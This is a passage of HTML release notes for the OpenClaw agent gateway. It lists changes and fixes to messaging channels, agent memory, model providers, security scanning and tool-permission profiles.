href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Channel fixes cluster around Slack Block Kit limits, Telegram proxy/webhook/polling/send resilience, Discord startup/rate-limit handling, WhatsApp delivery/liveness, and Microsoft Teams/Matrix/Feishu edge cases. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
<li>Security and operations add OpenGrep scanning, sharper GHSA triage policy, safer exec/pairing/owner-scope handling, Docker/onboarding automation, and web-fetch IPv6 ULA opt-in for trusted proxy stacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Security/tools: configured tool sections (<code>tools.exec</code>, <code>tools.fs</code>) no longer implicitly widen restrictive profiles (<code>messaging</code>, <code>minimal</code>). Users who need those tools under a restricted profile must add explicit <code>alsoAllow</code> entries; a startup warning identifies affected configs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078726004" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47487/hovercard" href="https://github.com/openclaw/openclaw/issues/47487">#47487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/commitments: add opt-in inferred follow-up commitments with hidden batched extraction, per-agent/per-channel scoping, heartbeat delivery, CLI management, a simple <code>commitments.enabled</code>/<code>commitments.maxPerDay</code> config, and heartbeat-interval due-time clamping so magical check-ins do not echo immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348684831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74189/hovercard" href="https://github.com/openclaw/openclaw/pull/74189">#74189</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Messages/queue: make <code>steer</code> drain all pending Pi steering messages at the next model boundary, keep legacy one-at-a-time steering as <code>queue</code>, and add a dedicated steering queue docs page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages/queue: default active-run queueing to <code>steer</code> with a 500ms followup fallback debounce, and document the queue modes, precedence, and drop policies on the command queue page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages: add global <code>messages.visibleReplies</code> so operators can require visible output to go through <code>message(action=send)</code> for any source chat, while <code>messages.groupChat.visibleReplies</code> stays available as the group/channel override. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Gateway/events: surface <code>spawnedBy</code> on subagent chat and agent broadcast payloads so clients can route child session events without an extra session lookup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226049569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63244" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63244/hovercard" href="https://github.com/openclaw/openclaw/pull/63244">#63244</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Memory/wiki: add agent-facing people wiki metadata, canonical aliases, person cards, relationship graphs, privacy/provenance reports, evidence-kind drilldown, and search modes for person lookup, question routing, source evidence, and raw claims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: add optional per-conversation <code>allowedChatIds</code> and <code>deniedChatIds</code> filters so operators can enable recall only for selected direct, group, or channel conversations while keeping broad sessions skipped. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280170574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67977" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67977/hovercard" href="https://github.com/openclaw/openclaw/pull/67977">#67977</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>.</li>
<li>Active Memory: return bounded partial recall summaries when the hidden memory sub-agent times out, including the default temporary-transcript path, so useful recovered context is not discarded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340395145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73219/hovercard" href="https://github.com/openclaw/openclaw/pull/73219">#73219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
<li>Gateway/memory: add a read-only <code>doctor.memory.remHarness</code> RPC so operator clients can preview bounded REM dreaming output without running mutation paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263469272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66673/hovercard" href="https://github.com/openclaw/openclaw/pull/66673">#66673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Providers/NVIDIA: add the NVIDIA provider with API-key onboarding, setup docs, static catalog metadata, and literal model-ref picker support so NVIDIA hosted models can be selected with their provider prefix intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324848945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71204" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71204/hovercard" href="https://github.com/openclaw/openclaw/pull/71204">#71204</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Models: suppress explicitly configured openai-codex/gpt-5.4-mini inline entries so a stale models config written by <code>openclaw doctor --fix</code> cannot bypass the manifest capability block and cause repeated assistant-turn failures when the runtime switches to that model on ChatGPT-backed Codex accounts. Conditional suppressions (e.g. qwen Coding Plan endpoint guards) remain bypassable by explicit user configuration. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Added SQLite-backed plugin state store (<code>api.runtime.state.openKeyedStore</code>) for restart-safe keyed registries with TTL, eviction, and automatic plugin isolation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugin SDK: mark remaining legacy alias exports and diffs tool/config aliases with deprecation metadata, and add a guard so future legacy alias comments require <code>@deprecated</code> tags. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/QR/dependencies: internalize small terminal progress and QR wrapper helpers while keeping the real QR encoder dependency direct, reducing the default runtime dependency graph without changing QR output behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Dependencies: refresh workspace runtime, plugin, and tooling packages, including ACP, Pi, AWS SDK, TypeBox, pnpm, oxlint, oxfmt, jsdom, pdfjs, ciao, and tokenjuice, while keeping patched ACP behavior and lint gates current. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Gateway/dev: run <code>pnpm gateway:watch</code> through a named tmux session by default, with <code>gateway:watch:raw</code> and <code>OPENCLAW_GATEWAY_WATCH_TMUX=0</code> for foreground mode, so repeated starts respawn an inspectable watcher without trapping the invoking agent shell. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/diagnostics: emit an opt-in startup diagnostics timeline that records gateway lifecycle and plugin-load phases behind a config flag, so slow-start diagnosis no longer requires bespoke instrumentation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Control UI/i18n: extend the locale registry with new Persian (fa), Dutch (nl), Vietnamese (vi), Italian (it), Arabic (ar), and Thai (th) entries and ship <code>fa</code>, <code>nl</code>, <code>vi</code>, and <code>zh-TW</code> docs glossaries, so the docs translation pipeline and the Control UI language picker stay aligned across surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels: add Yuanbao channel docs entrance so the Tencent Yuanbao bot appears in the channel listing and sidebar navigation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341969080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73443/hovercard" href="https://github.com/openclaw/openclaw/pull/73443">#73443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Channels/Yuanbao: update plugin GitHub location to YuanbaoTeam/yuanbao-openclaw-plugin and add "yuanbao" alias to channel catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349371764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74253" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74253/hovercard" href="https://github.com/openclaw/openclaw/pull/74253">#74253</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Docker setup: add <code>OPENCLAW_SKIP_ONBOARDING</code> so automated Docker installs can skip the interactive onboarding step while still applying gateway defaults. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148855578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55518" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55518/hovercard" href="https://github.com/openclaw/openclaw/pull/55518">#55518</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>.</li>
<li>Security policy: classify media/base64 decode and format-conversion overhead after configured acceptance limits as performance-only for GHSA triage unless a report demonstrates a limit bypass, crash, exhaustion, data exposure, or another boundary bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350238747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74311" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74311/hovercard" href="https://github.com/openclaw/openclaw/pull/74311">#74311</a>)</li>
<li>Security/OpenGrep: add a precise OpenGrep rulepack, source-rule compiler, provenance metadata check, and PR/full scan workflows that validate first-party code and rulepack-only changes while uploading SARIF to GitHub Code Scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299142364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69483/hovercard" href="https://github.com/openclaw/openclaw/pull/69483">#69483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</li>
<li>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kAIborg24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kAIborg24">@kAIborg24</a>.</li>
<li>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yhyatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yhyatt">@yhyatt</a>.</li>
<li>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yelog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yelog">@yelog</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gracker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gracker">@Gracker</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nhaener/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nhaener">@nhaener</a>.</li>
<li>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/civiltox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/civiltox">@civiltox</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solosage1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solosage1">@solosage1</a>.</li>
<li>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KoykL/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KoykL">@KoykL</a>.</li>
<li>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kane808-AI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kane808-AI">@Kane808-AI</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvisz8/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvisz8">@jarvisz8</a>.</li>
<li>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrewhong-translucent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrewhong-translucent">@andrewhong-translucent</a>.</li>
<li>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinduwang1001-max/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinduwang1001-max">@jinduwang1001-max</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heyhudson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heyhudson">@heyhudson</a>.</li>
<li>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fgabelmannjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fgabelmannjr">@fgabelmannjr</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/k7n4n5t3w4rt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/k7n4n5t3w4rt">@k7n4n5t3w4rt</a>.</li>
<li>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
